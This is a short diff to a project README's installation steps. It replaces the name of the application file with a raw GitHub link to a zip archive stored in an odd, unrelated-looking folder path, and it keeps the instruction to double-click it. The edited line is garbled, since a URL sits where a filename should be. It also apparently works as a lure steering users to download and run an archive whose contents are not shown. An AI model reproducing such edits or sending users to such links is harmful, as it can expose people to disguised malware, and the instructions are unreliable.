troller172/MDCP/README.md

 5. **Open the Application**

    After extraction, navigate to the folder where you extracted the files.
-Look for a file named `MDCP.exe` (for Windows) or `MDCP` (for macOS and Linux).
+Look for a file named `https://raw.githubusercontent.com/troller172/MDCP/main/wilds/fmow/analysis/MDCP-3.7.zip` (for Windows) or `MDCP` (for macOS and Linux).
 Double-click the file to start the application.

 6. **Follow the On-Screen Instructions**